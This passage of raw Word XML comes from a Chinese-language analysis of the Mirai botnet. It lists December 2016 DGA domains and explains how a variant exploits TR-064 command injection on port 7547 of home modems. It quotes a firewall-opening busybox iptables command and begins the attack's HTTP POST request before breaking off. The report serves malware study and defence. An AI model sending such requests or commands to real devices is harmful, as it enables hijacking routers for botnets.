          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/16 nuuxndqlhiwb.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/17 pxvmqwpemiif.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/18 dfftxpajygxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/19 fiotbgopgnxv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/20 shjwhbdgjyba.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/21 xmjvlucdsegk.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/22 irkbpugkwsir.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/23 nwnrbhnesmtk.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/24 wafunxdngsfc.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/25 ydcvedrxcmym.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/26 sggiyqadywsv.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/27 ujmnvkyeltfv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/28 cmhewcvopvno.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/29 hrjlyymassqx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/30 xsvftelyclfh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/31 dxukryyyqnhl.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>其中12月</w:t>
      </w:r>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18/19/27/29/30日只几天未能生成有效的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DGA域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，其余</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名均</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>已被Mirai作者注册。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3C78" w:rsidRPr="00F63C30" w:rsidRDefault="005E3C78" w:rsidP="00583BC0"/>
    <w:p w:rsidR="00F63267" w:rsidRDefault="00F63267" w:rsidP="009A1AB3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc469905249"/>
      <w:r>
        <w:t>感染原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00C2519C" w:rsidRDefault="00C2519C" w:rsidP="00C2519C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai恶意程序按照其入侵方式可分为两种。早期Mirai扫描23/2323端口，利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Telnet弱口令种植木马</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>。 2016年11月出现的变种</w:t>
      </w:r>
      <w:r>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7547</w:t>
      </w:r>
      <w:r>
        <w:t>/5555</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描，</w:t>
      </w:r>
      <w:r w:rsidRPr="00452B08">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>利用远程命令执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>绿盟分别</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>对这两种恶意程序的源码进行了分析</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
            <w:bCs/>
          </w:rPr>
          <w:id w:val="1092735990"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
            </w:rPr>
            <w:instrText>CITATION 李东宏16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
            <w:bCs/>
          </w:rPr>
          <w:id w:val="-1890103300"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>。下面仅介绍变种Mirai的原理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>受攻击的路由器默认将7547端口分配给TR-069协议，该协议全称为“CPE WAN Management Protocol”，用于远程管理设备，ISP可以利用该协议对这些设备远程进行管理，因此7547端口就被暴露到了互联网上。然而在Eir</w:t>
      </w:r>
      <w:r w:rsidR="000C123E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="4"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> D1000 modem中，7457端口同时还被TR-064协议“LAN-Side CPE Configuration”使用。这个协议的目的是让ISP给路由器安装软件，但是并不是面向路由器的WAN端。当两个服务一起进行时，就产生了错误，这个漏洞最早是在2016年11月7日爆出来的。</w:t>
      </w:r>
      <w:r w:rsidR="00247FA1" w:rsidRPr="00247FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在TR-064的说明文档中</w:t>
      </w:r>
      <w:r w:rsidR="00110B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提到</w:t>
      </w:r>
      <w:r w:rsidR="00247FA1" w:rsidRPr="00247FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，TR-064服务允许在CPE</w:t>
      </w:r>
      <w:r w:rsidR="00221B73">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="5"/>
      </w:r>
      <w:r w:rsidR="00247FA1" w:rsidRPr="00247FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上对NTP/SNTP时间客户端进行配置。</w:t>
      </w:r>
      <w:r w:rsidR="00AC028D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而某些设备在实现这一功能时，允许攻击者注入任意命令</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="409208838"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00AC028D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION len16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AC028D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E70CAA" w:rsidRDefault="00E70CAA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0506" w:rsidRDefault="007C0506">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1300378"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="https://upload.wikimedia.org/wikipedia/commons/e/ef/Remote_CPE_Control_via_TR-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f/Remote_CPE_Control_via_TR-0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00378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0506" w:rsidRDefault="007C0506">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0506" w:rsidRDefault="007C0506">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRDefault="005363C5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者通过</w:t>
      </w:r>
      <w:r w:rsidR="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SOAP Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对7547端口发送特定命令的数据包，执行命令“busybox iptables -I INPUT -p tcp --dport 80 -j ACCEPT”，开启防火墙80端口，使攻击者远程访问网络管理界面，植入攻击代码。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRDefault="00B01A51">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>具体地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者是向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP/7547发送如下HTTP POST报文：</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POST /UD/act</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>?1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1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Host: 127.0.0.1:7547</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lastRenderedPageBreak/>
        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)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SOAPAction: urn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>:dslforum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>-org:service:Time:1#SetNTPServers</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Content-Type: text/xml</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Content-Length: 526</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>&lt;?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> version="1.0"?&gt;</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&lt;SOAP-ENV</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
